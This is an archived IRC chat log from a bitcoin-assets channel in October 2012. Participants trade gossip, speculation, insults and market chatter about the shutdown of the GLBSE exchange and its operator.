news from the good doctor? Oct 06 04:11:56 boonies4u yea, he cut and run Oct 06 04:12:07 i said news from him, not about him Oct 06 04:12:21 He's in UK right? it is like 2am here Oct 06 04:12:26 and he is scheduled for news today Oct 06 04:12:31 so maybe he'll have some later in the day Oct 06 04:12:45 yeah, that's it, he's just sleeping Oct 06 04:13:30 Ah, time for crazy scenario speculation then just like pirate: One of his chinese wife's relative (or his wife) got sick and he's running with the money in China to have said person treated. Oct 06 04:13:35 "I wish I would have sold for 0.06 when I had the chance." Oct 06 04:13:41 famouslast workd Oct 06 04:13:43 words* Oct 06 04:13:50 BTC-Mining: that was MNW's right? Oct 06 04:13:53 story that is Oct 06 04:14:07 ;;ticker Oct 06 04:14:07 Best bid: 12.694, Best ask: 12.8, Bid-ask spread: 0.10600, Last trade: 12.695, 24 hour volume: 31069, 24 hour low: 12.51, 24 hour high: 12.96399 Oct 06 04:14:12 no? Just made it up about Nefario. Oct 06 04:14:26 He was in China for some time, claimed to be visiting his wife's relatives Oct 06 04:14:34 before going back home in the UK Oct 06 04:14:46 i think MNW when his bet was going on Oct 06 04:14:52 fuck, the chinese relic hunter is holding his wife captive, and needs our info for identify theft Oct 06 04:14:55 traveled cross country Oct 06 04:15:21 post-hoc ergo propter-hoc (sp?) makes for some good crazy stories Oct 06 04:15:55 Maybe I can sell my glbse claim to someone who can stomach the withdrawl requirements. Oct 06 04:16:25 sell it to Azelphur Oct 06 04:16:26 B0g4r7 maybe for btc helf you folks could have a syndicate Oct 06 04:16:26 B0g4r7: me Oct 06 04:16:30 he has nothing to hide Oct 06 04:16:30 1 id demands all accts. Oct 06 04:16:46 actually, this would be the perfect way to stick it to nefario Oct 06 04:16:49 he already has my infos Oct 06 04:16:53 every glbse customer get together, Oct 06 04:16:54 I may try and do that, but I'm gonna wait a bit first and see what happens. Oct 06 04:16:55 pick one identity Oct 06 04:16:57 give him that Oct 06 04:17:02 and demand ALL ACCOUNTS under it Oct 06 04:17:13 make glbse go down in history for what it was : a huge selftrade platform. Oct 06 04:17:25 everyone, sign you shit over to me, and document the tx Oct 06 04:17:26 B0g4r7, doubt it's possible, will require an unique identity for your account. Oct 06 04:17:26 lol Oct 06 04:17:36 when it's over, i'll send the stuffs back to you Oct 06 04:17:55 I'll sign contracts for everything Oct 06 04:17:55 this is so funny Oct 06 04:17:59 HEY EVERYONE LISTEN UP Oct 06 04:18:03 IM NEFARIO Oct 06 04:18:11 AND I HAVE ALL YOUR MONEY Oct 06 04:18:17 [MPEX] [S.MPOE] 39300 @ 0.00037146 = 14.5984 BTC [-] Oct 06 04:18:17 [MPEX] [S.MPOE] 900 @ 0.00037145 = 0.3343 BTC [-] Oct 06 04:18:22 AND IM NOW LIVING IT UP ON THE ISLE OF WHITE Oct 06 04:18:34 why the isle of white? Oct 06 04:18:36 ignore NO_OOh ALL Oct 06 04:18:37 NO_OOh!*@* added to ignore list. Oct 06 04:18:54 Usage: QUERY [-nofocus] , opens up a new privmsg window to someone Oct 06 04:19:05 ;;later tell theymos you're disgusting, you know that ? Oct 06 04:19:05 The operation succeeded. Oct 06 04:19:45 Does anyone have channel logs from when (if) Nefario was on irc previously, and can you check if the host matches? Oct 06 04:19:52 i have them Oct 06 04:19:56 The host doesn't match Oct 06 04:20:05 Not even close I guess? Oct 06 04:20:07 maybe nefarios wife got sick of hime saying LIKE all the time and left, so he needed the money to mail order another one Oct 06 04:20:12 i'm surprised my loan to invest in mining ops and hardware actually was fulfilled, even after I announced that I would be delaying its activation due to glbse going down Oct 06 04:21:19 [12:53] * nefario (~james@92.40.253.69.threembb.co.uk) has joined #bitcoin-assets Oct 06 04:21:31 thx Oct 06 04:21:31 his usual IP/ISP Oct 06 04:22:59 gigavps: oh hey giga Oct 06 04:23:07 is he up? Oct 06 04:23:19 I don't want to wake him up *cough cough* Oct 06 04:23:23 0:3 Oct 06 04:24:08 it's 3 am in the UK, phone probably off Oct 06 04:24:15 would be my guess Oct 06 04:24:27 my guess is that voicemail is full anyways Oct 06 04:25:33 [MPEX] [F.GIGA.ETF] 89300 @ 0.00004046 = 3.6131 BTC [+] Oct 06 04:27:40 sup Oct 06 04:27:46 [MPEX] [S.BVPS] 371 @ 0.0034151 = 1.267 BTC [-] Oct 06 04:27:47 [MPEX] [S.BVPS] 1000 @ 0.0034007 = 3.4007 BTC [-] Oct 06 04:27:48 [MPEX] [S.BVPS] 18 @ 0.00340069 = 0.0612 BTC [-] Oct 06 04:27:49 [MPEX] [S.BVPS] 450 @ 0.00339771 = 1.529 BTC [-] Oct 06 04:27:50 [MPEX] [S.BVPS] 521 @ 0.00338559 = 1.7639 BTC [-] Oct 06 04:27:52 [MPEX] [S.BVPS] 300 @ 0.00338521 = 1.0156 BTC [-] Oct 06 04:27:56 [MPEX] [F.GIGA.ETF] 43312 @ 0.00007229 = 3.131 BTC [+] Oct 06 04:28:03 Bugpowder o you missed out on the fun Oct 06 04:28:05 come on dudes Oct 06 04:28:09 don't sell BVPS Oct 06 04:28:10 Bugpowder glbse is gone. Oct 06 04:28:13 they are paying 3% Oct 06 04:28:15 dude Oct 06 04:28:23 I was the first one to notice Oct 06 04:28:24 for good. Oct 06 04:28:27 nono Oct 06 04:28:27 who started the thread Oct 06 04:28:28 moar. Oct 06 04:28:30 I read it Oct 06 04:28:34 theymos Oct 06 04:28:37 a ok :p Oct 06 04:28:38 blah blah blah Oct 06 04:28:46 send your license to nefario Oct 06 04:28:49 get your coins Oct 06 04:28:53 maybe I wil Oct 06 04:29:19 [MPEX] [F.GIGA.ETF] 12000 @ 0.00010894 = 1.3073 BTC [+] Oct 06 04:29:34 theymos' thread interests me Oct 06 04:29:44 I fucked up Oct 06 04:29:49 nefario sure is comiong off as pathetic Oct 06 04:29:50 4% of coins in GLBSE Oct 06 04:29:53 Bugpowder: and you are? Oct 06 04:30:09 gigamining Oct 06 04:30:17 it was what kept me in Oct 06 04:30:30 needs a security innuers collective to start a new site Oct 06 04:30:31 giga is a good guy, he'll work with you Oct 06 04:30:38 yeah Oct 06 04:30:39 *issuers Oct 06 04:30:49 I wanted to make a private placement with him Oct 06 04:30:53 https://bitcointalk.org/index.php?topic=115553.0 maybe use that Oct 06 04:31:13 no no no Oct 06 04:31:20 private investment is better Oct 06 04:31:26 It's so funny Oct 06 04:31:34 Bugpowder o lol remember when you sold f.gigia.etf cause you wanted to hold on glbse ? :D Oct 06 04:31:37 sure but we need to get our users data off glvbse Oct 06 04:31:37 litecoin global? Oct 06 04:31:38 lol Oct 06 04:31:45 who would have though t that Romania was an advantage Oct 06 04:31:49 the code for it can be changed to btc Oct 06 04:32:01 Bugpowder why do you think i'm here lol. for the pussy ? Oct 06 04:32:11 hey gigavps how long does delivery of a bfl single take? Oct 06 04:32:14 Dude. I owned 85% of F.GIGA Oct 06 04:32:22 I own 39 shares of GIGAMINING Oct 06 04:32:26 big whoop Oct 06 04:32:31 http://www.cnvmr.ro/en/index.htm actually romania has a sec Oct 06 04:32:33 a ? thought you had a lot Oct 06 04:32:39 noagendamarket ofcourse ?! Oct 06 04:32:47 dunno if they know about mpex yet thouygh ;) Oct 06 04:32:49 it also has a stock exchange Oct 06 04:32:51 bvb.ro Oct 06 04:33:20 but honestly i think mpex's site looks better Oct 06 04:33:26 lool Oct 06 04:33:29 PFFF Oct 06 04:33:29 lol Oct 06 04:33:32 looks better? Oct 06 04:33:34 wat Oct 06 04:33:34 [MPEX] [F.GIGA.ETF] 10000 @ 0.00010894 = 1.0894 BTC [+] Oct 06 04:33:35 trollin Oct 06 04:33:55 it did when the unicorn was there Oct 06 04:34:01 it looks lie a cross between my little pony and geocities Oct 06 04:34:30 noagendamarket aptly put. Oct 06 04:35:04 i am still puzzled by the bias of idiocy in bitcoinland. Oct 06 04:35:09 Eh, MPEx is awful eyesight/usability wise. Oct 06 04:35:12 people regularly shittalk the actual correct solutions Oct 06 04:35:13 do you have alicense from the romanian sec ? Oct 06 04:35:17 It's pretty much aesthetical Oct 06 04:35:25 text based glbse looks better than mpex Oct 06 04:35:25 people regularly back the scammers in spite of piles of evidence Oct 06 04:35:26 why ? Oct 06 04:35:45 i mean it's practically a deathwish or something of the sort. Oct 06 04:36:11 its actually great on eyesight, usabilty is fine but i grant you its easier to not use pgp than to use it. but its more usable than glbse waiting 2 min between loads Oct 06 04:36:32 glbse load time is/was shit Oct 06 04:36:38 I hope you never regged the domain or the servers using a credit card Oct 06 04:36:40 boonies4u "butthatsok" ? Oct 06 04:36:48 what's ok? Oct 06 04:36:54 MPEX loads fast Oct 06 04:36:58 glbse load time is/was shit <<< Oct 06 04:37:00 or the site is linked to you physically in any way Oct 06 04:37:01 do you forget what you say ? Oct 06 04:37:11 mircea_popescu: no that's it Oct 06 04:37:14 noagendamarket tried googling mircea popescu ? Oct 06 04:37:15 glbse load time is/was shit Oct 06 04:37:31 boonies4u and so therefore glbse is/was shit ? Oct 06 04:37:39 yes hes some rich fucker lol Oct 06 04:37:51 mircea_popescu: no, cloudflare is shit Oct 06 04:37:57 boonies4u you're an idiot :) Oct 06 04:38:01 i'm joking :P Oct 06 04:38:06 whoa. /ignore boonies4u Oct 06 04:38:13 you got that in within a second lmao Oct 06 04:38:26 wtf are you going on about? Oct 06 04:38:42 i was just about to add you to my long and growing list of people i ignore. Oct 06 04:38:53 because I was blaming the shitty load time on cloudflare? Oct 06 04:39:02 no, because you were being an idiot. Oct 06 04:39:26 by complaining about glbse's load time? Oct 06 04:39:27 ??? Oct 06 04:39:38 no. by failing to understand that bad load time is a killer in this discussion Oct 06 04:39:51 looks are not. load time is. Oct 06 04:40:02 all you IBB holders get ready for guantanamo Oct 06 04:40:17 a lot of things are factors Oct 06 04:40:25 i will let you know when 30 btc is acceptable Oct 06 04:40:54 pigeons lol srsly why do you keep trolling ppl ? Oct 06 04:41:18 Ah, I guess I regret giving you ASICMINER shares to short mircea Oct 06 04:41:18 how does IBB make money again? Oct 06 04:41:18 do you not know there's kids rubbing off furiously to fantasies of them getting gitmo'd tonight ? Oct 06 04:41:24 should have sold them. Oct 06 04:41:50 so has anyone vanished since glbse went down? Oct 06 04:41:55 other than nefario ofc Oct 06 04:42:06 BTC-Mining o, i guess that's fucked now huh. Oct 06 04:42:08 wanna settle ? Oct 06 04:42:26 boonies4u: usagi has been quiet and was a little upset Oct 06 04:42:29 I'm just watching the GLBSE talk atm, he's sitting there talking about how he works on it full time, and there are people who are working full time on it Oct 06 04:42:42 I wonder what those people who work full time running assets are going to do Oct 06 04:42:44 Azelphur aren't these films great in retrospect ? Oct 06 04:42:46 pigeons: yeah, i doubt he's gonna vanish cause of this though Oct 06 04:42:50 this is why i read newspapers 3 months later. Oct 06 04:43:03 mircea_popescu: hehe Oct 06 04:43:38 usagi got saved by this i would guess. Oct 06 04:44:02 yeah Oct 06 04:44:02 Saved from himself Oct 06 04:44:04 so now i can't update my nefario rating cause i don't want to lose my position as first to have negged him. Oct 06 04:44:09 Nice thing is that visionaries can see what is happening in retrospect Oct 06 04:44:14 but he really deserves a -10 Oct 06 04:44:25 rdponticelli no mate. i saw it in frontespect. Oct 06 04:44:46 https://bitcointalk.org/index.php?topic=77343.msg930030#msg930030 this is May. read that. Oct 06 04:44:46 Well, is just other way of call it Oct 06 04:45:11 I saw it coming too Oct 06 04:45:19 Eh, settle? Settle for what? Oct 06 04:45:28 Remember me lowering my exposure? Oct 06 04:45:43 Nothing left so far... assuming shareholder lists go out... what to do? Oct 06 04:46:13 move to MPEx xD Oct 06 04:46:18 #solutions Oct 06 04:46:41 BTC-Mining well, i'll give you 10 BTC which is admittedly more than market value and you sign a gpg receipt renouncing any claim on that contract. Oct 06 04:46:43 how about that ? Oct 06 04:46:56 Eh, nah Oct 06 04:47:01 #assets-otc therocktrading.com cryptostocks.com Oct 06 04:47:05 You can keep it. Oct 06 04:47:19 You wanted to short it, you keep the benefits. Oct 06 04:47:28 I'll survive Oct 06 04:47:49 haha holy crap, he's talking about my loan! Oct 06 04:47:52 in bitcoin conference Oct 06 04:47:52 haha Oct 06 04:47:59 I'M FAMOUS \o/ Oct 06 04:48:08 BTC-Mining hey, it's more of an academic exercise. i'd like to do the full circle trade in contracts Oct 06 04:48:17 to show how it works. it's why i'm offering over market. Oct 06 04:49:04 You always were... Oct 06 04:49:46 Azelphur has been famous ever since pympex :D Oct 06 04:49:54 \o/ Oct 06 04:50:08 I feel quite honored for the mention at the conference though haha, awesome Oct 06 04:50:08 i don't know much about ya Azelphur Oct 06 04:50:18 http://www.youtube.com/watch?v=vmPD_YSQ--k&t=18m17s this, the 400 GBP was me xD Oct 06 04:50:19 just see you name around places Oct 06 04:50:49 ironically, wasn't nefario trying to convince conference atendees about how scammy mpex is ? Oct 06 04:50:59 mircea_popescu: XD Oct 06 04:51:22 i guess that worked out fine for him. Oct 06 04:51:30 I have GIGA.ETF shares now... someone sold into the bids when GLBSE closedown was announced =/ Oct 06 04:51:52 o hey Oct 06 04:52:03 what's interesting though is everyone is calling him a scammer, he repaid that loan in full, with interest Oct 06 04:52:07 Was it you? Oct 06 04:52:24 Sep 16 01:13:36 mircea_popescu: would you like me to mention you or mpex? Oct 06 04:52:24 Sep 16 01:14:01 no. Oct 06 04:52:56 I made £40 on that loan xD Oct 06 04:52:58 BTC-Mining wasn't me, i hold virtually none Oct 06 04:55:21 uh... well I have no idea who. Oct 06 04:56:12 BTC-Mining don't worry,. when i get kyc done i'll pass info along Oct 06 04:56:15 :D Oct 06 04:57:46 mircea_popescu: should I start one of those, 'all yous who told mpoe-pr to shove it when she was telling you glbse was a scam, come here and apologise" threads? Oct 06 04:57:49 ;) Oct 06 04:58:22 lol Oct 06 04:58:27 not like they will anyway. Oct 06 04:58:40 people'd rather be wrong and poor. Oct 06 04:58:53 seriously? not me Oct 06 04:59:24 well not everyone, but the sort that don't like mpex, invest in ponzis, think business = website + domain name etc. Oct 06 04:59:27 People were angry she invented fact/misquoted them/passed rumors as facts. Not her actual claims. Oct 06 04:59:30 i'm wrong often and admit it often enough. luckily i'm usually wrong about trivial things Oct 06 05:00:12 like how many km is rivendel away from the source of the river it banks on Oct 06 05:00:18 fuck that trivia question Oct 06 05:00:25 lmao Oct 06 05:00:30 i hate trivia Oct 06 05:00:42 [MPEX] [S.MPOE] 100 @ 0.00037145 = 0.0371 BTC [-] Oct 06 05:00:43 [MPEX] [S.MPOE] 29100 @ 0.00037144 = 10.8089 BTC [-] Oct 06 05:00:48 I couldn't even google that question. Oct 06 05:00:59 I had to break out my 1st edition LOTR Oct 06 05:01:00 Nefario went full retard. Never go full retard Oct 06 05:01:29 why would you register a fucking bitcoin site using a credit card Oct 06 05:01:33 [MPEX] [F.GIGA.ETF] 30165 @ 0.00003037 = 0.9161 BTC [-] Oct 06 05:01:47 (yeah, that's me bragging about having a first edition fellowship of the rings ;) Oct 06 05:02:00 bow to me! Oct 06 05:02:01 ooh that is a nice book to have Oct 06 05:02:42 My Granny gave it to me :) Oct 06 05:02:53 [MPEX] [F.GIGA.ETF] 110635 @ 0.00003037 = 3.36 BTC [-] Oct 06 05:02:54 [MPEX] [F.GIGA.ETF] 54900 @ 0.00004451 = 2.4436 BTC [+] Oct 06 05:03:08 ;;ticker Oct 06 05:03:09 Best bid: 12.68888, Best ask: 12.68899, Bid-ask spread: 0.00011, Last trade: 12.689, 24 hour volume: 27683, 24 hour low: 12.51, 24 hour high: 12.89999 Oct 06 05:04:36 I'm surprised we haven't seen a 'pirate' style selloff in coins Oct 06 05:04:42 Bugpowder why ? Oct 06 05:04:58 I guess anyone that paid attention to this shit already sold their coins or lost them Oct 06 05:05:26 glbse was really small Oct 06 05:05:48 https://bitcointalk.org/index.php?topic=115669.0 Oct 06 05:05:49 wat Oct 06 05:06:49 hi Oct 06 05:07:05 First 7-day mining growth contraction in months Oct 06 05:07:06 WELP Oct 06 05:07:06 http://bitcoin.sipa.be Oct 06 05:07:08 THATS THE END OF DMC. Oct 06 05:07:32 http://www.youtube.com/watch?v=dsx2vdn7gpY Oct 06 05:10:27 Diablo-D3 o really ?! Oct 06 05:11:21 mircea_popescu: oh shuddup. Oct 06 05:14:02 You're a bit late Diablo-D3 Oct 06 05:14:19 I dont care anymore Oct 06 05:14:20 I really dont Oct 06 05:14:34 Sadly, the end of DMC started when it started Oct 06 05:14:47 how zen Oct 06 05:14:52 I think everyone is now back to hoarding. Oct 06 05:15:10 Good by, bitcoin economy Oct 06 05:15:17 bitcoin just wasnt ready for what I was offering Oct 06 05:15:23 and now thanks to nefario, it never will be Oct 06 05:16:02 Diablo-D3: how would this stop a bitcoin company going public on a 'legit' exchange? Oct 06 05:16:20 Come on, if your plan was sustainable, you can keep going with it anywhere Oct 06 05:16:23 smickles: because there arent any. Oct 06 05:16:36 rdponticelli: because I no longer give a shit. Oct 06 05:16:43 if someone wants to take the plan and do it themselves, they can Oct 06 05:16:47 Diablo-D3: um, amex, nyse, nasdaq? Oct 06 05:16:55 smickles: like I said, there arent any. Oct 06 05:16:58 Ok, but it started way before glbse collapse Oct 06 05:17:34 .wik legitimate Oct 06 05:17:35 "Legitimacy (law)" - http://en.wikipedia.org/wiki/Legitimate Oct 06 05:17:54 smickles: goldman sachs. your turn. Oct 06 05:18:34 Diablo-D3: all I meant is an exchange that complies with regulations, GS is not an exchange Oct 06 05:18:37 derp Oct 06 05:19:00 smickles: no, but GS makes me question the legitimacy of the entirety of wall street. Oct 06 05:19:35 Diablo-D3: ok, there goes nyse, how about the american stock exchange, or cboe Oct 06 05:19:37 !ticker s.dice Oct 06 05:19:38 [MPEX:S.DICE] 1day: 0.0032 / 0.00334331 / 0.00339998 (20466 shares, 68.42 BTC), 30day: 0.0032 / 0.0033745 / 0.0034 (1798868 shares, 6,070.29 BTC) Oct 06 05:19:47 Kludge : When Nefario blackmailed me & the IceHill team by saying he'd unlock our securities if we allowed a swap option, he kept writing "equity steak." I've never forgiven him for repeatedly writing "steak" -- if nothing else, he needs a scammer tag for that. Oct 06 05:20:10 I bet equity stake tastes good Oct 06 05:20:11 er Oct 06 05:20:12 If Kludge is slamming your finance knowledge..... Oct 06 05:20:32 Whatever. Oct 06 05:20:47 Nothing ever goes right. Oct 06 05:21:00 there's also an exchange in kansas city that I know of Oct 06 05:21:13 smickles: I just dont care, dude. Oct 06 05:21:25 Some people are born businessmen, I'm not one of them. Oct 06 05:21:30 all legitimate 'merican exchanges off wall street Oct 06 05:22:27 if you don't care, Diablo-D3, why make a statement like youdid? Oct 06 05:22:30 actually you can sell a bitcoin mining company through the pink sheets market legally if you have a broker Oct 06 05:22:31 We should start the great facepalm prize of bitcoin Oct 06 05:22:50 noagendamarket: good point, i hadn't thought of that Oct 06 05:23:00 just sell to an acredited investor Oct 06 05:23:10 It would be nice to have some hardware if yu want to sell a mining company Oct 06 05:23:27 smickles no just a broker Oct 06 05:23:34 hmm who is selling hardwarE? Oct 06 05:23:44 Nobody Oct 06 05:23:47 3: Oct 06 05:23:55 Only worthless bons Oct 06 05:24:11 noagendamarket: not that i know for sure, but arn't brokers a subset of accredited investors? Oct 06 05:24:14 bon bons? Oct 06 05:24:19 not sure Oct 06 05:24:28 I have some 5850s NIB Oct 06 05:24:32 pink sheets is just an otc brokers market Oct 06 05:24:59 If Kludge is slamming your finance knowledge..... <<< this. Oct 06 05:25:03 I'll make an exchange who would only deal with pink shits Oct 06 05:25:05 do we have any licensed brokers in the chan? Oct 06 05:25:21 dont know Oct 06 05:25:38 doubt it Oct 06 05:25:40 i'm not interested in GPUs Oct 06 05:26:02 But maybe my pink shits exchange will be to alike to glbse... :s Oct 06 05:26:19 you can have porivate companies with less than 500 investors Oct 06 05:26:30 indeed Oct 06 05:26:41 did you learn that from reading facebook stories, noagendamarket Oct 06 05:26:44 that's why s2cm is considering that alternative Oct 06 05:27:02 Bugpowder no from researching it :P Oct 06 05:27:15 Bugpowder: it's also on the sec website, laws and regulation section Oct 06 05:27:27 ^^^^ Oct 06 05:27:34 well Oct 06 05:27:39 I think maybe Im glad I got out when I did Oct 06 05:27:45 I learned about it from stories about the facebook IPO Oct 06 05:27:51 so suck it Oct 06 05:27:55 at least I managed to buy back half the shares while I could Oct 06 05:27:55 the jobs act increases the number of investors to 2500 Oct 06 05:27:59 if only GLBSE had given asset issuers the info required for regulation D exemption Oct 06 05:28:04 this would've never happened Oct 06 05:28:28 noagendamarket: only for certain types of offerings tho, right? Oct 06 05:28:28 smickles: yes, maybe if nefario wasnt a mouth breathing greedy fucktard, none of this wouldnt have happened Oct 06 05:28:52 it didnt help that nefario registered eveything using a credit card Oct 06 05:29:01 a mouth breathing greedy fucktard can still be compliant and successful Oct 06 05:29:05 like a noob Oct 06 05:29:22 smickles: yes, formerly Oct 06 05:29:26 noagendamarket what's your boner for credit cards ? Oct 06 05:29:59 mircea_popescu: noagendamarket is really JCD Oct 06 05:30:02 [MPEX] [S.MPOE] 26251 @ 0.00037384 = 9.8137 BTC [+] Oct 06 05:30:04 [MPEX] [S.MPOE] 15049 @ 0.00037389 = 5.6267 BTC [+] Oct 06 05:30:07 he likes cash money Oct 06 05:30:38 no...they are good for some things but not regging an illegal stock exchange server lol Oct 06 05:30:45 ok, so if you pay your server bills cash-in-mail and always lick the envelope counterclockwise while reciting the solomon creed you're magically protected from ill and harm ? Oct 06 05:31:08 meanwhile in rome : http://worldnews.nbcnews.com/_news/2012/10/05/14235787-snacking-tourists-fined-after-rome-declares-war-on-the-sandwich?lite Oct 06 05:31:10 shhhh, don't let it out! Oct 06 05:31:27 it probabluy helps if you dont approach the FSA and tell them youre running an unregistered stock exchange Oct 06 05:31:42 mircea_popescu: i saw a guy get ticked for taking tomatos off of a sandwich and throwing them in a trash can Oct 06 05:32:11 ugh Oct 06 05:32:13 why ?! Oct 06 05:32:37 because rome is illegal and is a terrorist state in violation of international law Oct 06 05:32:39 it's a law in vegas to curb the bird population at the landfill Oct 06 05:33:03 lol vegas Oct 06 05:33:06 thats not even a real place Oct 06 05:33:19 ??? Oct 06 05:33:26 smickles ridiculous. so what do i do with the tomato, feed it to the cop ? Oct 06 05:33:28 yeah i don't think using a credit card to register the site is nefario's problem Oct 06 05:33:34 its some place they made up to film movies Oct 06 05:33:51 mircea_popescu: no, you're supposed to order the sandwich w/o tomatoes Oct 06 05:34:04 cause salmonilla Oct 06 05:34:05 smickles how about they're supposed to felate me. Oct 06 05:34:22 no felating in public Oct 06 05:34:23 :P Oct 06 05:34:25 seriously, a town of illegal, yet legal, gambling joints ran by the mob, I mean, legitimate businessmen, filled to the brim with illegal, yet legal, prostitutes Oct 06 05:34:26 mircea_popescu: well, it is vegas Oct 06 05:34:32 no one believes that shit Oct 06 05:34:50 boonies4u in europe it's kinda accepted practice by now. Oct 06 05:34:54 Diablo-D3: wtf? Oct 06 05:35:01 welll dudes time to retire Oct 06 05:35:10 nn Oct 06 05:35:19 smickles: do you know what the real world is? Oct 06 05:35:21 mircea_popescu: lol Oct 06 05:35:31 Diablo-D3: I believe so Oct 06 05:35:41 its a dirty filthy place where theres no blinking lights or jobs or food or any of that shit they portray Oct 06 05:35:46 The real world is Vanguard yearly dividends paying out on 9/21 Oct 06 05:35:49 ohhhh yeah Oct 06 05:35:51 so far as I know, you must assume that this world is real Oct 06 05:35:52 later dudes Oct 06 05:36:14 Can the end of the world really be in 2012? Please? It seems it would solve everything. Oct 06 05:36:21 BTC-Mining: I agree. Oct 06 05:36:25 No more problems, ever. Oct 06 05:36:26 yeah that would be nice Oct 06 05:36:32 if the world ended this year, I would not complain Oct 06 05:36:35 yep, no dick clark to ring in 2013 Oct 06 05:36:44 I think its time we just turn the place off and go home. Oct 06 05:36:45 Diablo-D3: I've got a cousin who lives in vegas. I've been there several times, it's fairly well like any other place in 'merica Oct 06 05:37:08 I hope its an asteroid so its quick lol Oct 06 05:37:27 aww BTC-Mining , it'll pass. Oct 06 05:37:28 I hope its a race of female aliens that want to kidnap the men. Oct 06 05:37:36 hahah Oct 06 05:37:50 you dont have to tie me up! I come willingly! wait, you know what I mean Oct 06 05:37:52 some shit will go down, because people are going to do stupid shit in december Oct 06 05:37:54 i just hope mormonism really was the right answer Oct 06 05:38:03 pigeons how many wives ? Oct 06 05:38:05 it will be funny if you can only escape on their ship if you give them bitcoins Oct 06 05:38:09 self-fulfilled prophecy and all that Oct 06 05:38:20 satoshi = planet x lol Oct 06 05:38:34 bitcoins into space? Oct 06 05:38:53 I have a prophecy: a clusterfuck is coming.... Oct 06 05:39:00 satoshi = the calamity from the skies Oct 06 05:39:03 been there done that :P Oct 06 05:39:39 Why there's always coming a clusterfuck in this damn environment? Oct 06 05:39:59 the environment IS a clusterfuck Oct 06 05:40:17 because you keep prophecizing it Oct 06 05:40:34 you're all wrong anyhow Oct 06 05:40:39 No, it's all maya's fault Oct 06 05:40:40 the world already ended, we're just too stupid to see it Oct 06 05:40:42 :D Oct 06 05:41:13 Well, I would like to thank Usagi for making me paranoid Oct 06 05:41:21 She made me withdraw my funds. Oct 06 05:41:28 heh Oct 06 05:41:32 So GLBSE site says "We will update our users on Saturday." and theymos' message is Saturday (UTC) at Today at 12:00:57 AM. Oct 06 05:41:39 Coincidence? Oct 06 05:41:40 I'd like to thank bitcoin for making me reaffirm my faith in paranoia Oct 06 05:41:56 <____Atlas_____> sgornick: Probably but it saved my butt Oct 06 05:42:04 I used to believe that no one could be trusted because everyone is just a bunch of greedy bastards Oct 06 05:42:12 then I found bitcoin and thought maybe I was wrong Oct 06 05:42:13 <____Atlas_____> Now Nefario is 100 BTC short in his lawyer fund Oct 06 05:42:16 sgornick not likely coincidence Oct 06 05:42:23 nope, I was right Oct 06 05:42:28 I was right the whole time =/ Oct 06 05:42:29 they had a board meeting or shareholder meeting or homeless meeting or w/e they do Oct 06 05:43:28 But then you wasn't right when you thought you was wrong Oct 06 05:43:34 Theymos announcement is after the GLBSE owners meeting Oct 06 05:43:44 rdponticelli: its called "false hope" Oct 06 05:44:00 He probably planned to give an explanation himself today, after said meeting... Oct 06 05:44:32 <____Atlas_____> "Guys, its the illuminati!" Oct 06 05:44:37 <____Atlas_____> "They are trying to kill me!" Oct 06 05:44:42 Diablo-D3, anonymous currency... greedy bastards issues would of course be worse. Oct 06 05:44:47 <____Atlas_____> "I don't have much time!" Oct 06 05:44:50 so, it's likely we're not going to be hearing anything new from nefario? Oct 06 05:44:52 On the other hand, free, unregulated transactions. Oct 06 05:45:03 I think everyone is trying to kill you atlas Oct 06 05:45:10 I wanted to believe in something important once in my life and not be jaded about it and actually really think it would succeed Oct 06 05:45:10 <____Atlas_____> Challenge accepted. Oct 06 05:45:38 <____Atlas_____> Life would be boring if everybody loved me. Oct 06 05:45:43 Ok, I'll make a guess at what Nefario's announcement will be: Oct 06 05:45:56 its not logical to think things will be different Oct 06 05:45:57 What of all the Atlas are you going to kill? Oct 06 05:46:03 "i need your ID cause, legal stuff" Oct 06 05:46:06 but I thought maybe just this one time it would be Oct 06 05:46:11 Be carefull, the others will take revenge Oct 06 05:46:14 <____Atlas_____> I killed a deer once. It tasted good. Oct 06 05:47:10 I killed a couple of bunnies once, they tasted good and made nice mococins Oct 06 05:47:15 (sp?) Oct 06 05:47:36 mocasin Oct 06 05:48:23 time for a little powerplay i guess. Oct 06 05:48:49 ;;ticker Oct 06 05:48:49 Best bid: 12.689, Best ask: 12.729, Bid-ask spread: 0.04000, Last trade: 12.689, 24 hour volume: 27746, 24 hour low: 12.51, 24 hour high: 12.89999 Oct 06 05:49:12 <____Atlas_____> I took a huge loss when I escaped the GLBSE Oct 06 05:49:16 <____Atlas_____> but it was well worth it Oct 06 05:49:47 [22:45] Ok, I'll make a guess at what Nefario's announcement will be: "Ok, so yeah, I'll give a code list for every asset, hmm... It was kind of boring me, hmm... also won't listen to other GLBSE owners as they technically don't officially own anything since GLBSE was not registered anywhere and hmm... yeah, they can have this old code I guess. So I'm kind of just going to Oct 06 05:49:47 go ahead and do a regulated exchange... but now by doing all this shit I'll need a lawyer's advice so... well yeah, I fetched Bitcoins in the users' deposits. The other owners of GLBSE I just screwed can pay you back that. I don't care about GLBSE anymore." Oct 06 05:50:27 <____Atlas_____> Sad but likely true. Oct 06 05:50:30 Have some fun, it's speculation time. Oct 06 05:50:50 <____Atlas_____> The man had good intentions Oct 06 05:50:59 <____Atlas_____> but the road to hell is paved with them Oct 06 05:51:05 Well Atlas, as long as we can get asset holders lists, at least not everything would be lost. Oct 06 05:51:19 <____Atlas_____> Hopefully Oct 06 05:51:26 Just the value of assets would be screwed by the hardship of exchanging them. Oct 06 05:51:30 Only faith will be lost Oct 06 05:51:41 But was lost long time ago, anyway Oct 06 05:51:43 Yes, faith would certainly be lost. Oct 06 05:51:51 Everything just goes poof... Oct 06 05:52:01 Few serious enough ventures. Oct 06 05:52:06 Everything IS poof Oct 06 05:52:40 Well look at GLBSE, asking for standard trading fees... their monthly income was measly. Oct 06 05:52:43 sudo hoarding mode on Oct 06 05:52:47 :D Oct 06 05:54:12 <____Atlas_____> Nefario: I needed a good lawyer Oct 06 05:54:18 <____Atlas_____> so I spent every last time. Oct 06 05:54:24 <____Atlas_____> It was either jail time or this Oct 06 05:54:31 <____Atlas_____> so fuck you, got mine. Oct 06 05:54:35 He just needed to shut his mouth Oct 06 05:54:44 <____Atlas_____> dime* Oct 06 05:55:01 His bit mouth Oct 06 05:55:10 s/bit/big/ Oct 06 05:55:30 <____Atlas_____> Mistake #1: Recognizing the feds. Oct 06 05:55:41 <____Atlas_____> Mistake #2: Actually talking to them. Oct 06 05:55:55 <____Atlas_____> Mistake #3: Acting afraid and being a giant pussy. Oct 06 05:56:19 <____Atlas_____> If he just pretended he didn't get the message and refunded everyone Oct 06 05:56:32 so https://bitcointalk.org/index.php?topic=115693.0 let's have a little fun Oct 06 05:56:34 Mistake #4: Showing his face publicly as 